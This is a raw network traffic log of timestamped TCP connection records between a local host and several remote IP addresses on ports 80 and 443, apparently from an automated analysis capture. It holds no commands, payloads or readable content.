                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.624126911 CET49827443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.629369974 CET44349828172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.629528046 CET44349828172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.629590034 CET49828443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.629746914 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.629985094 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.630014896 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.630247116 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.636167049 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.636674881 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.636682987 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.637171030 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.637176037 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.637372017 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.637458086 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.637494087 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.637551069 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.678669930 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.678740978 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.760255098 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.760353088 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.760385036 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.760477066 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.762811899 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.762890100 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.762983084 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.763544083 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.767842054 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.767926931 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.767966986 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.768037081 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.772933960 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.773011923 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.773045063 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.773274899 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.778017998 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.778095007 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.778146029 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.778281927 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.784013987 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.784050941 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.784095049 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.784130096 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.788156033 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.788233042 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.788275003 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.788429022 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.794605017 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.794616938 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.794689894 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.798424959 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.798439026 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.798506975 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.803914070 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.803926945 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.803994894 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.804033041 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.808871031 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.808881998 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.808964014 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.813672066 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.813710928 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.813757896 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.813790083 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.816780090 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.816816092 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.816855907 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.816884041 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.820602894 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.820638895 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.820686102 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.820719957 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.824374914 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.824425936 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.824598074 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.828191042 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.828227997 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.828280926 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.828315020 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.832194090 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.832287073 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.832361937 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.832437992 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.835673094 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.835706949 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.835740089 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.835777998 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.839030981 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.839112043 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.839153051 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.839929104 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.842858076 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.842947960 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.843030930 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.846664906 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.846718073 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.846793890 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.846793890 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.864272118 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.864336967 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.864485025 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.866147995 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.866166115 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.866223097 CET49898443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.866236925 CET4434989813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.868941069 CET49906443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.868963003 CET4434990613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.869493008 CET49906443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.869791985 CET49906443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.869807959 CET4434990613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.926069975 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.926141977 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.926316977 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.932892084 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.932914972 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.932930946 CET49899443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.932938099 CET4434989913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.935770988 CET49907443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.935816050 CET4434990713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.936002016 CET49907443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.936203003 CET49907443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.936218977 CET4434990713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.938570976 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.938644886 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.938724995 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.939119101 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.939143896 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.939244032 CET49900443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.939254999 CET4434990013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.955467939 CET49908443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.955553055 CET4434990813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.955653906 CET49908443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.955987930 CET49908443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.956023932 CET4434990813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.961524010 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.961597919 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.961611032 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.961848021 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.962976933 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.963093996 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.963167906 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.965966940 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.966039896 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.966116905 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.966279984 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.968904972 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.969022036 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.969158888 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.971762896 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.971820116 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.971878052 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.972480059 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.974648952 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.974848986 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.974853039 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.975090027 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.977469921 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.977560043 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.977581024 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.978096008 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.980235100 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.980340004 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.980366945 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.980381966 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.983042955 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.983115911 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.983212948 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.983536959 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.985841990 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.986037016 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.986102104 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.988646984 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.988712072 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.988791943 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.988833904 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.991432905 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.991497993 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.991544008 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.991600037 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.994266987 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.994327068 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.994368076 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.994415998 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.997045040 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.997127056 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.997188091 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.999846935 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.999906063 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:52.999970913 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.000119925 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.002635002 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.002672911 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.002707958 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.002743006 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.005449057 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.005518913 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.005561113 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.005625010 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.008250952 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.008341074 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.008354902 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.008490086 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.011039972 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.011157990 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.011248112 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.011248112 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.013858080 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.013967991 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.014020920 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.016684055 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.016778946 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.016861916 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.019447088 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.019637108 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.019973040 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.022272110 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.022330999 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.022372007 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.022427082 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.025044918 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.025105953 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.025171041 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.025216103 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.027841091 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.027894020 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.028014898 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.028064013 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.030951023 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.030963898 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.031002045 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.031034946 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.033447981 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.033518076 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.033562899 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.033617973 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.036282063 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.036349058 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.036400080 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.039043903 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.039104939 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.039160967 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.039225101 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.041872025 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.041924000 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.041953087 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.041996002 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.044672012 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.044735909 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.044759035 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.044881105 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.047435045 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.047517061 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081320047 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081388950 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081439018 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081702948 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081718922 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081727982 CET49902443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.081732988 CET4434990213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.084403038 CET49909443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.084428072 CET4434990913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.084494114 CET49909443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.084624052 CET49909443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.084635019 CET4434990913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.162832975 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.162900925 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.162976980 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:53.163156033 CET4990180192.168.2.5185.215.113.16
